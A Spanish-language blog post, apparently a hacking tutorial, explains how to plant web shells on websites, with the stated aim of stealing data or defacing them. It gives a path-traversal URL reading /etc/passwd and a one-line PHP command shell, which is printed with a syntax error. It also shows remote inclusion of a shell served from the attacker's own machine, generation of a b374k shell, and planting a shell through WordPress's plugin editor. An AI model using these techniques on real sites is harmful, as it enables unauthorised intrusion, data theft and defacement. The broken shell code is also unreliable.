Advertisement

header ads

Algunos métodos sobre una INYECCIÓN de SHELL

Espero que este articulo no te aburra y intentare detallarlo todo, para que intentes probarlo.


En este post aprenderás algunos método sobre como inyectar una shell a un sitio web y robar datos o defacear.

En un CTF que publique en mi pagina hace un tiempo lo hice para que algunos usuarios practicarán pero no lograban modificar nada.
  Hoy vamos a jugar con ese directorio en el cual le puse upload_file que tiene como vulnerabilidad lo siguiente.



Nos vamos a enfocar sobre PATH Travesal que consiste que hacer un para de comando sobre la linea de la ULR, ejemplo:
http://192.168.1.20/upload_file/index.php?download=../../../../../etc/passwd
Pero enfocate en subirle una shell para mejor manejo.
La shell básica:
<? system($_REQUEST['cmd'];?>
Sin ninguna interfaz lo podemos subir en una extensión php, en este caso el servidor acepta cualquier extensión. PROBAMOS!
python3 -m http.server
Recuerda que vamos subirlo desde tu propia maquina por eso usamos ese comando y buscar tu shell en tu sistema.
http://192.168.1.2:8000/porn.php
Ahí vemos que porn.php no ejecuta nuestra sell.

 La shell básica es del pasado porque no me muestra nada como habrás visto en la captura.
Vamos a crear una con una herramienta que esta en GITHUB o sino hay varios sitios que te ofrecen SHELL infectado.
https://github.com/b374k/b374k.git
cd b374k/
Para crear la SHELL .txt
php index.php -o shell.txt -p password
Ahora intentemos subirla y ver como quedo, obviamente te pide contraseña cuando colocaste -p “PASSWORD”

 Ahora intentemos ejecutando como:
http://192.168.1.20/upload_file/index.php?download=http://192.168.1.2:8000/shell.txt

 Obviamente podes subir la shell pero no podes editar nada, has escuchado de las chicas “Solo mira pero no toques” bueno parecido así es ahora este caso.

SEGUNDO MÉTODO:

En este caso tenemos un WORDPRESS, siempre funciona si logras acceder, puede hacer fuerza bruta o encontrando una vulnerabilidad para acceder en mi caso ya accedí pero necesito montar la SHELL. Puedes usar la herramienta anterior que publique para crear uno.
– Vamos a la zona de plugin y editemos y intenta probar con todas a ver cual funciona.

  En mi caso use uno llamado “HELLO.php”
 Recuerda que aveces hay buenos servidores programados y algunas veces no podes acceder a la INDEX.html para modificarlo pero podemos agregar directorio y subir nuestro deface.
EJEMPLO:

  En la captura te estoy mostrando que tienes permiso para editar, borrar o agregar desde tu propia SHELL.

Ahora yo tengo un servidor que he accedido pero quiero inyectar una shell pero hay personas que usan Burpsuite para editar el archivo mientras que va subiendo con una extensión .txt pasarlo a .php.

Error en subir una shell



Obviamente el servidor no me deja visualizar mi shell, he probado con muchas shell diferentes y he tenido el mismo resultado pero si te pones a leer el código te muestra lo siguiente.

 Tienes acceso a subir esas extensiones pero tenemos un problemas que la shell en modo imagen no visualiza y si llego a subir un pdf en modo shell no funciona y logro subir un PDF infectado tampoco funciona porque el PDF no es un ejecutable en una URL
Lastimosamente tuve que buscar otra entrada.
Ademas kali Linux te ofrece algunas shell para vos.
ls -l /usr/share/webshells/
Y bueno espero no haberte aburrido y espero haberte enseñado un poco, no te olvides en compartirlo y darle amor!
GRACIAS!

Publicar un comentario

0 Comentarios